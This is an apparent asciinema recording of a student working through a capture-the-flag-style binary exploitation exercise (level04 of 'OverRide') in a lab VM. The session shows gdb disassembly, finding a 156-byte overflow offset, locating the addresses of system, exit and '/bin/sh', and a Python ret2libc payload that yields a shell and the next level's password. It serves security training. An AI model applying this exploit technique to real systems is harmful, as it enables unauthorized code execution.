{"version": 2, "width": 151, "height": 41, "timestamp": 1753973397, "env": {"SHELL": "/bin/zsh", "TERM": "xterm-256color"}}
[0.034935, "o", "Restored session: Thu Jul 31 12:20:32 CEST 2025\r\n"]
[0.390493, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                      \r \r"]
[0.390906, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u0007"]
[0.391645, "o", "\u001b]2;edouard@MacBook-Pro-de-Edouard\u0007\u001b]1;..tHub/OverRide\u0007"]
[0.393534, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u001b\\"]
[0.394206, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mOverRide\u001b[00m \u001b[K"]
[0.394291, "o", "\u001b[?1h\u001b="]
[0.394372, "o", "\u001b[?2004h"]
[0.452787, "o", "\r\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mOverRide\u001b[00m \u001b[01;34mgit:(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[3.423164, "o", "s"]
[3.603559, "o", "\bss"]
[3.666023, "o", "h"]
[4.198037, "o", " level04@192.168.1.189 -p 4242"]
[5.170064, "o", "\u001b[?1l\u001b>\u001b[?2004l\r\r\n"]
[5.171825, "o", "\u001b]2;ssh level04@192.168.1.189 -p 4242\u0007\u001b]1;level04@192.168.1.189\u0007"]
[5.285332, "o", "\t   ____                  ____  _     __   \r\n\t  / __ \\_   _____  _____/ __ \\(_)___/ /__ \r\n\t / / / / | / / _ \\/ ___/ /_/ / / __  / _ \\\r\n\t/ /_/ /| |/ /  __/ /  / _, _/ / /_/ /  __/\r\n\t\\____/ |___/\\___/_/  /_/ |_/_/\\__,_/\\___/ \r\n                                          \r\n                       Good luck & Have fun\r\n\r\n   To start, ssh with level00/level00 on 192.168.1.189:4242\r\n"]
[5.294744, "o", "\r"]
[5.295222, "o", "level04@192.168.1.189's password: "]
[13.146293, "o", "\r\n"]
[13.178091, "o", "\r\n"]
[13.23329, "o", "RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE\r\n\u001b[33mPartial RELRO\u001b[m   \u001b[31mNo canary found\u001b[m   \u001b[31mNX disabled\u001b[m   \u001b[31mNo PIE       \u001b[m   \u001b[32mNo RPATH \u001b[m  \u001b[32mNo RUNPATH \u001b[m  \u001b[37;41m/home/users/level04/level04\u001b[m\r\n\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[14.282244, "o", "c"]
[14.395705, "o", "l"]
[14.518008, "o", "e"]
[14.717019, "o", "a"]
[14.886643, "o", "r"]
[14.921576, "o", "\r\n"]
[14.922093, "o", "\u001b[H\u001b[2J\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[15.453032, "o", "l"]
[15.534449, "o", "s"]
[15.666504, "o", "\r\n"]
[15.668452, "o", "\u001b[0m\u001b[37;41mlevel04\u001b[0m\r\n\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[16.642825, "o", "."]
[16.725741, "o", "/"]
[16.964663, "o", "l"]
[17.042317, "o", "e"]
[17.232537, "o", "vel04 "]
[17.366865, "o", "\r\n"]
[17.368161, "o", "Give me some shellcode, k\r\n"]
[19.707098, "o", "\""]
[20.082067, "o", "\""]
[20.248893, "o", "^[[D"]
[21.172865, "o", "\r\nchild is exiting...\r\n\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[23.517029, "o", "c"]
[23.585304, "o", "l"]
[23.771749, "o", "e"]
[24.173182, "o", "a"]
[24.385042, "o", "r"]
[24.533398, "o", "\r\n\u001b[H\u001b[2J\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[25.189734, "o", "l"]
[25.279146, "o", "s"]
[25.38307, "o", "\r\n"]
[25.384179, "o", "\u001b[0m\u001b[37;41mlevel04\u001b[0m\r\n\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[28.28187, "o", "g"]
[35.10515, "o", "d"]
[35.229749, "o", "b"]
[35.406781, "o", " "]
[35.725629, "o", "."]
[35.765057, "o", "/"]
[35.992063, "o", "l"]
[36.059581, "o", "e"]
[36.265167, "o", "vel04 "]
[36.482522, "o", "\r\n"]
[36.500782, "o", "GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04\r\nCopyright (C) 2012 Free Software Foundation, Inc.\r\nLicense GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\r\nThis is free software: you are free to change and redistribute it.\r\nThere is NO WARRANTY, to the extent permitted by law.  Type \"show copying\"\r\n"]
[36.50615, "o", "and \"show warranty\" for details.\r\nThis GDB was configured as \"x86_64-linux-gnu\".\r\nFor bug reporting instructions, please see:\r\n<http://bugs.launchpad.net/gdb-linaro/>...\r\nReading symbols from /home/users/level04/level04...(no debugging symbols found)...done.\r\n(gdb) "]
[39.052348, "o", "d"]
[39.220025, "o", "i"]
[39.585247, "o", "s"]
[39.717567, "o", "a"]
[39.783978, "o", "s"]
[40.280721, "o", " "]
[40.450716, "o", "m"]
[40.518815, "o", "a"]
[40.639393, "o", "i"]
[40.806871, "o", "n"]
[41.049891, "o", "\r\nDump of assembler code for function main:\r\n"]
[41.052545, "o", "   0x080486c8 <+0>:\tpush   %ebp\r\n   0x080486c9 <+1>:\tmov    %esp,%ebp"]
[41.055753, "o", "\r\n   0x080486cb <+3>:\tpush   %edi\r\n   0x080486cc <+4>:\tpush   %ebx\r\n   0x080486cd <+5>:\tand    $0xfffffff0,%esp\r\n   0x080486d0 <+8>:\tsub    $0xb0,%esp\r\n   0x080486d6 <+14>:\tcall   0x8048550 <fork@plt>\r\n   0x080486db <+19>:\tmov    %eax,0xac(%esp)\r\n   0x080486e2 <+26>:\tlea    0x20(%esp),%ebx\r\n   0x080486e6 <+30>:\tmov    $0x0,%eax\r\n   0x080486eb <+35>:\tmov    $0x20,%edx\r\n   0x080486f0 <+40>:\tmov    %ebx,%edi\r\n   0x080486f2 <+42>:\tmov    %edx,%ecx\r\n   0x080486f4 <+44>:\trep stos %eax,%es:(%edi)\r\n   0x080486f6 <+46>:\tmovl   $0x0,0xa8(%esp)\r\n   0x08048701 <+57>:\tmovl   $0x0,0x1c(%esp)\r\n   0x08048709 <+65>:\tcmpl   $0x0,0xac(%esp)\r\n"]
[41.057823, "o", "   0x08048711 <+73>:\tjne    0x8048769 <main+161>\r\n   0x08048713 <+75>:\tmovl   $0x1,0x4(%esp)\r\n   0x0804871b <+83>:\tmovl   $0x1,(%esp)\r\n   0x08048722 <+90>:\tcall   0x8048540 <prctl@plt>\r\n   0x08048727 <+95>:\tmovl   $0x0,0xc(%esp)\r\n   0x0804872f <+103>:\tmovl   $0x0,0x8(%esp)\r\n   0x08048737 <+111>:\tmovl   $0x0,0x4(%esp)\r\n   0x0804873f <+119>:\tmovl   $0x0,(%esp)\r\n   0x08048746 <+126>:\tcall   0x8048570 <ptrace@plt>\r\n   0x0804874b <+131>:\tmovl   $0x8048903,(%esp)\r\n   0x08048752 <+138>:\tcall   0x8048500 <puts@plt>\r\n   0x08048757 <+143>:\tlea    0x20(%esp),%eax\r\n   0x0804875b <+147>:\tmov    %eax,(%esp)\r\n   0x0804875e <+150>:\tcall   0x80484b0 <gets@plt>\r\n   0x08048763 <+155>:\tjmp    0x804881a <main+338>\r\n   0x08048768 <+160>:\tnop\r\n   0x08048769 <+161>:\tlea    0x1c(%esp),%eax\r\n   0x0804876d <+165>:\tmov    %eax,(%esp)\r\n   0x08048770 <+168>:\tcall   0x80484f0 <wait@plt>\r\n   0x08048775 <+173>:\tmov    0x1c(%esp),%eax\r\n   0x08048779 <+177>:\tmov    %eax,0xa0(%esp)\r\n   0x08048780 <+184>:\tmov    0xa0(%esp),%eax\r\n---Type <return>"]
[41.057988, "o", " to continue, or q <return> to quit---"]
[46.113161, "o", "\r\n   0x08048787 <+191>:\tand    $0x7f,%eax\r\n   0x0804878a <+194>:\ttest   %eax,%eax\r\n   0x0804878c <+196>:"]
[46.119936, "o", "\tje     0x80487ac <main+228>\r\n   0x0804878e <+198>:\tmov    0x1c(%esp),%eax\r\n   0x08048792 <+202>:\tmov    %eax,0xa4(%esp)\r\n   0x08048799 <+209>:\tmov    0xa4(%esp),%eax\r\n   0x080487a0 <+216>:\tand    $0x7f,%eax\r\n   0x080487a3 <+219>:\tadd    $0x1,%eax\r\n   0x080487a6 <+222>:\tsar    %al\r\n   0x080487a8 <+224>:\ttest   %al,%al\r\n   0x080487aa <+226>:\tjle    0x80487ba <main+242>\r\n   0x080487ac <+228>:\tmovl   $0x804891d,(%esp)\r\n   0x080487b3 <+235>:\tcall   0x8048500 <puts@plt>\r\n   0x080487b8 <+240>:\tjmp    0x804881a <main+338>\r\n   0x080487ba <+242>:\tmovl   $0x0,0xc(%esp)\r\n   0x080487c2 <+250>:\tmovl   $0x2c,0x8(%esp)\r\n   0x080487ca <+258>:\tmov    0xac(%esp),%eax\r\n   0x080487d1 <+265>:\tmov    %eax,0x4(%esp)\r\n   0x080487d5 <+269>:\tmovl   $0x3,(%esp)\r\n   0x080487dc <+276>:\tcall   0x8048570 <ptrace@plt>\r\n   0x080487e1 <+281>:\tmov    %eax,0xa8(%esp)\r\n   0x080487e8 <+288>:\tcmpl   $0xb,0xa8(%esp)\r\n   0x080487f0 <+296>:\tjne    0x8048768 <main+160>\r\n   0x080487f6 <+302>:\tmovl   $0x8048931,(%esp)\r\n   0x080487fd <+309>:\tcall   0x804"]
[46.120014, "o", "8500 <puts@plt>\r\n   0x08048802 <+314>:\tmovl   $0x9,0x4(%esp)\r\n   0x0804880a <+322>:\tmov    0xac(%esp),%eax\r\n   0x08048811 <+329>:\tmov    %eax,(%esp)\r\n   0x08048814 <+332>:\tcall   0x8048520 <kill@plt>\r\n   0x08048819 <+337>:\tnop\r\n   0x0804881a <+338>:\tmov    $0x0,%eax\r\n   0x0804881f <+343>:\tlea    -0x8(%ebp),%esp\r\n   0x08048822 <+346>:\tpop    %ebx\r\n   0x08048823 <+347>:\tpop    %edi\r\n   0x08048824 <+348>:\tpop    %ebp\r\n   0x08048825 <+349>:\tret    \r\nEnd of assembler dump.\r\n(gdb) "]
[48.256006, "o", "s"]
[48.43312, "o", "e"]
[48.498286, "o", "t"]
[48.650802, "o", " "]
[49.050006, "o", "f"]
[49.148304, "o", "o"]
[49.992413, "o", "l"]
[50.11503, "o", "l"]
[50.359604, "o", "o"]
[51.136699, "o", "w"]
[51.305999, "o", "-"]
[51.774509, "o", "f"]
[51.900605, "o", "o"]
[52.025822, "o", "r"]
[52.539263, "o", "-"]
[53.462897, "o", "m"]
[53.638505, "o", "o"]
[53.697984, "o", "d"]
[53.854738, "o", "e"]
[53.963031, "o", " "]
[54.713403, "o", "c"]
[54.801472, "o", "h"]
[55.057303, "o", "i"]
[55.338653, "o", "ld"]
[56.548525, "o", "\r\nNo symbol table is loaded.  Use the \"file\" command.\r\n(gdb) "]
[59.395453, "o", "set follow-for-mode child"]
[59.865003, "o", "\b"]
[60.378426, "o", "\b"]
[60.458132, "o", "\b"]
[60.536861, "o", "\b"]
[60.628592, "o", "\b"]
[60.751945, "o", "\b"]
[60.803732, "o", "\b"]
[60.874755, "o", "\b"]
[60.968542, "o", "\b"]
[61.050055, "o", "\b"]
[61.115843, "o", "\b"]
[61.921044, "o", "\u001b[1@k"]
[62.180808, "o", "\r\n(gdb) "]
[64.856035, "o", "r"]
[64.938834, "o", "u"]
[65.455913, "o", "n"]
[66.39727, "o", "\r\nStarting program: /home/users/level04/level04 \r\n"]
[66.404818, "o", "[New process 1791]\r\nGive me some shellcode, k\r\n"]
[95.210416, "o", "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnno"]
[95.211548, "o", "oooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzz\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 1791]\r\n0x6e6e6e6e in ?? ()\r\n(gdb) "]
[119.717038, "o", "i"]
[119.898394, "o", "r"]
[119.900114, "o", " "]
[120.60654, "o", "\b \b"]
[120.741696, "o", "\b \b"]
[120.97319, "o", " "]
[121.177637, "o", "r"]
[121.241745, "o", " "]
[121.538404, "o", "\r\neax            0x0\t0\r\necx            0xf7fd08c4\t-134412092\r\nedx            0xffffd660\t-10656\r\nebx            0x6b6b6b6b\t1802201963\r\nesp            0xffffd700\t0xffffd700\r\nebp            0x6d6d6d6d\t0x6d6d6d6d\r\nesi            0x0\t0\r\nedi            0x6c6c6c6c\t1819044972\r\neip            0x6e6e6e6e\t0x6e6e6e6e\r\neflags         0x10286\t[ PF SF IF RF ]\r\ncs             0x23\t35\r\nss             0x2b\t43\r\nds             0x2b\t43\r\nes             0x2b\t43\r\nfs             0x0\t0\r\ngs             0x63\t99\r\n(gdb) "]
[124.222621, "o", "i"]
[124.470246, "o", " "]
[124.900568, "o", "r"]
[124.985338, "o", " "]
[126.000419, "o", "e"]
[126.083627, "o", "i"]
[126.244999, "o", "p"]
[126.576608, "o", "\r\neip            0x6e6e6e6e\t0x6e6e6e6e\r\n(gdb) "]
[134.706913, "o", "0x6e6e6e6e"]
[135.387307, "o", " "]
[135.593873, "o", "="]
[135.661741, "o", " "]
[136.474936, "o", "n"]
[136.636483, "o", "n"]
[136.937708, "o", "n"]
[137.404494, "o", "n"]
[138.218256, "o", " "]
[138.42829, "o", "="]
[138.471118, "o", " "]
[138.939065, "o", "1"]
[140.931246, "o", "5"]
[140.967007, "o", "6"]
[142.021659, "o", "\b \b"]
[142.512117, "o", "\b \b"]
[142.604304, "o", "\b \b"]
[142.675082, "o", "\b \b"]
[142.769684, "o", "\b \b"]
[142.840571, "o", "\b \b"]
[142.926773, "o", "\b \b"]
[143.020558, "o", "\b \b"]
[143.117388, "o", "\b \b"]
[143.175866, "o", "\b \b"]
[143.270604, "o", "\b \b"]
[143.370016, "o", "\b \b"]
[143.436519, "o", "\b \b"]
[143.530038, "o", "\b \b"]
[143.595405, "o", "\b \b"]
[143.685486, "o", "\b \b"]
[143.778685, "o", "\b \b"]
[143.850747, "o", "\b \b"]
[143.940589, "o", "\b \b"]
[144.033318, "o", "\b \b"]
[144.100904, "o", "\b \b"]
[144.193939, "o", "\b \b"]
[144.284734, "o", "\b \b"]
[144.351088, "o", "\u0007"]
[144.441908, "o", "\u0007"]
[144.537239, "o", "\u0007"]
[144.601307, "o", "\u0007"]
[144.70034, "o", "\u0007"]
[145.290307, "o", "i"]
[145.499967, "o", "n"]
[146.287463, "o", "f"]
[146.358978, "o", "o"]
[146.475627, "o", " "]
[148.331133, "o", "f"]
[148.518224, "o", "u"]
[148.686822, "o", "n"]
[148.801814, "o", "c"]
[149.008782, "o", "t"]
[149.105145, "o", "i"]
[149.153499, "o", "o"]
[149.378377, "o", "n"]
[149.418245, "o", "s"]
[149.49132, "o", " "]
[150.022561, "o", "s"]
[150.257098, "o", "y"]
[150.445476, "o", "s"]
[150.563413, "o", "t"]
[150.677814, "o", "e"]
[151.011247, "o", "m"]
[151.205083, "o", "\r\nAll functions matching regular expression \"system\":\r\n\r\nNon-debugging symbols:\r\n0xf7e6aed0  __libc_system\r\n0xf7e6aed0  system\r\n0xf7f48a50  svcerr_systemerr\r\n(gdb) "]
[154.350999, "o", "x"]
[154.56122, "o", "/"]
[154.680205, "o", "s"]
[154.916816, "o", " "]
[155.101725, "o", "0xf7e6aed0"]
[155.453708, "o", "\r\n0xf7e6aed0 <system>:\t \"\\203\\354\\034\\211t$\\024\\213t$ \\211\\\\$\\020\\350\\217\\256\\016\"\r\n(gdb) "]
[160.926768, "o", "x/s 0xf7e6aed0"]
[161.298609, "o", "\b \b"]
[161.739411, "o", "\r(gdb) info functions system"]
[162.454487, "o", "\b \b"]
[162.588598, "o", "\b \b"]
[162.753847, "o", "\b \b"]
[162.888022, "o", "\b \b"]
[163.077825, "o", "\b \b"]
[163.465911, "o", "\b \b"]
[163.674198, "o", "e"]
[163.913742, "o", "x"]
[164.000256, "o", "i"]
[164.163212, "o", "t"]
[164.282601, "o", "\r\nAll functions matching regular expression \"exit\":\r\n\r\nNon-debugging symbols:\r\n0xf7e5eb70  exit\r\n0xf7e5eba0  on_exit\r\n0xf7e5edb0  __cxa_atexit\r\n0xf7e5ef50  quick_exit\r\n0xf7e5ef80  __cxa_at_quick_exit\r\n0xf7ee45c4  _exit\r\n0xf7f27ec0  pthread_exit\r\n0xf7f2d4f0  __cyg_profile_func_exit\r\n0xf7f4bc30  svc_exit\r\n0xf7f55d80  atexit\r\n(gdb) "]
[167.549787, "o", "x"]
[167.786807, "o", "/"]
[167.90581, "o", "s"]
[168.15532, "o", " "]
[168.320186, "o", "0xf7e5eb70"]
[168.514965, "o", "\r\n0xf7e5eb70 <exit>:\t \"S\\350\\375q\\017\"\r\n(gdb) "]
[175.664921, "o", "i"]
[175.867971, "o", "n"]
[175.981189, "o", "f"]
[176.112428, "o", "o"]
[176.220916, "o", " "]
[176.836454, "o", "p["]
[176.963792, "o", "r"]
[177.120926, "o", "o"]
[177.467765, "o", "\b \b"]
[177.6023, "o", "\b \b"]
[178.026249, "o", "\b \b"]
[178.550203, "o", "r"]
[178.72723, "o", "o"]
[178.813501, "o", "c"]
[178.883879, "o", " "]
[179.273872, "o", "m"]
[179.369754, "o", "a"]
[179.459277, "o", "p"]
[180.822293, "o", "\r\nprocess 1791\r\nMapped address spaces:\r\n\r\n\tStart Addr   End Addr       Size     Offset objfile\r\n\t 0x8048000  0x8049000     0x1000        0x0 /home/users/level04/level04\r\n\t 0x8049000  0x804a000     0x1000        0x0 /home/users/level04/level04\r\n\t 0x804a000  0x804b000     0x1000     0x1000 /home/users/level04/level04\r\n\t0xf7e2b000 0xf7e2c000     0x1000        0x0 \r\n\t0xf7e2c000 0xf7fcc000   0x1a0000        0x0 /lib32/libc-2.15.so\r\n\t0xf7fcc000 0xf7fcd000     0x1000   0x1a0000 /lib32/libc-2.15.so\r\n\t0xf7fcd000 0xf7fcf000     0x2000   0x1a0000 /lib32/libc-2.15.so\r\n\t0xf7fcf000 0xf7fd0000     0x1000   0x1a2000 /lib32/libc-2.15.so\r\n\t0xf7fd0000 0xf7fd4000     0x4000        0x0 \r\n\t0xf7fd8000 0xf7fda000     0x2000        0x0 \r\n\t0xf7fda000 0xf7fdb000     0x1000        0x0 \r\n\t0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]\r\n\t0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib32/ld-2.15.so\r\n\t0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib32/ld-2.15.so\r\n\t0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib32/ld-2.15.so\r\n\t0xfffdd0"]
[180.823388, "o", "00 0xffffe000    0x21000        0x0 [stack]\r\n(gdb) "]
[185.600827, "o", "f"]
[185.747815, "o", "i"]
[186.33844, "o", "n"]
[186.401442, "o", "d"]
[186.444682, "o", " "]
[187.009395, "o", "0xf7e2c000"]
[187.355923, "o", ","]
[187.496842, "o", " "]
[192.078391, "o", "0xf7fcc000"]
[193.098822, "o", ","]
[193.214191, "o", " "]
[193.747163, "o", "\""]
[193.979123, "o", "\""]
[194.119625, "o", "\b"]
[195.238834, "o", "/\"\b"]
[195.600312, "o", "b\"\b"]
[195.749783, "o", "i\"\b"]
[195.918838, "o", "n\"\b"]
[196.349737, "o", "/\"\b"]
[196.650614, "o", "s\"\b"]
[196.714872, "o", "h\"\b"]
[196.963038, "o", "\r\n"]
[197.248107, "o", "0xf7f897ec\r\n"]
[197.276717, "o", "1 pattern found.\r\n(gdb) "]
[199.8509, "o", "x"]
[200.111564, "o", "/"]
[200.199829, "o", "s"]
[200.453657, "o", " "]
[200.652553, "o", "0xf7f897ec"]
[201.030853, "o", "\r\n0xf7f897ec:\t \"/bin/sh\"\r\n(gdb) "]
[209.389811, "o", "quit\r\nA debugging session is active.\r\n\r\n\tInferior 2 [process 1791] will be killed.\r\n\r\nQuit anyway? (y or n) "]
[210.517062, "o", "EOF [assumed Y]\r\n"]
[210.518897, "o", "\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[216.142066, "o", "pytho"]
[216.143128, "o", "n -c "]
[216.149281, "o", "'print \"A\"*156 + \"\\xd0\\xae\\xe6\\xf7\" + \"\\x70\\xeb\\xe5\\xf7\" + \"\\xec\\x97\\xf8\\xf7\"' > /tmp/payload"]
[221.412654, "o", "\r\n"]
[221.421315, "o", "\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[223.478948, "o", "c"]
[223.693962, "o", "a"]
[223.777129, "o", "t"]
[223.910147, "o", " "]
[224.198821, "o", "/"]
[225.380612, "o", "t"]
[225.492358, "o", "m"]
[225.701642, "o", "p"]
[226.471481, "o", "/"]
[227.157005, "o", "p"]
[227.218901, "o", "a"]
[227.425669, "o", "yload "]
[228.603794, "o", "-"]
[228.868833, "o", " "]
[229.185734, "o", "|"]
[229.293989, "o", " "]
[230.067618, "o", "."]
[230.125046, "o", "/"]
[230.36893, "o", "l"]
[230.391316, "o", "e"]
[230.572341, "o", "vel04 "]
[232.366019, "o", "\r\n"]
[232.367476, "o", "Give me some shellcode, k\r\n"]
[234.469065, "o", "w"]
[234.583122, "o", "h"]
[234.795292, "o", "o"]
[234.976109, "o", "a"]
[235.046207, "o", "m"]
[235.228654, "o", "i"]
[235.440995, "o", "\r\n"]
[235.442374, "o", "level05\r\n"]
[238.218543, "o", "c"]
[238.474885, "o", "a"]
[239.088814, "o", "t"]
[239.204772, "o", " "]
[239.531426, "o", "/"]
[240.07806, "o", "h"]
[240.223017, "o", "o"]
[240.439175, "o", "m"]
[240.502226, "o", "e"]
[241.359807, "o", "/"]
[242.821898, "o", "u"]
[243.342335, "o", "s"]
[243.581076, "o", "e"]
[243.666728, "o", "r"]
[244.667482, "o", "s"]
[244.895177, "o", "/"]
[245.931075, "o", "l"]
[246.021275, "o", "e"]
[246.331577, "o", "v"]
[246.537015, "o", "e"]
[246.675253, "o", "l"]
[247.192522, "o", "0"]
[247.307555, "o", "5"]
[248.35698, "o", "/"]
[249.069176, "o", "."]
[249.460242, "o", "p"]
[249.690915, "o", "a"]
[249.978705, "o", "s"]
[250.139188, "o", "s"]
[250.306068, "o", "\r\n3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN\r\n"]
[252.811561, "o", "d"]
[252.87961, "o", "o"]
[253.093936, "o", "n"]
[253.160152, "o", "e"]
[253.607302, "o", "\r\n/bin/sh: 3: Syntax error: \"done\" unexpected\r\n"]
[258.733629, "o", "^C\r\n\u001b]0;level04@OverRide: ~\u0007level04@OverRide:~$ "]
[259.590716, "o", "logout\r\n"]
[259.59265, "o", "Connection to 192.168.1.189 closed.\r\r\n"]
[259.596096, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                      \r \r"]
[259.596959, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u0007"]
[259.599087, "o", "\u001b]2;edouard@MacBook-Pro-de-Edouard\u0007\u001b]1;..tHub/OverRide\u0007"]
[259.604812, "o", "\u001b]7;file://MacBook-Pro-de-Edouard.local/Users/edouard/Desktop/42-School/GitHub/OverRide\u001b\\"]
[259.606263, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mOverRide\u001b[00m \u001b[01;34mgit:(\u001b[31mmain\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[259.606392, "o", "\u001b[?1h\u001b="]
[259.606463, "o", "\u001b[?2004h"]
[260.648017, "o", "\u001b[?2004l\r\r\n"]
[260.663624, "o", "\r\nSaving session..."]
[260.672157, "o", "completed.\r\n"]
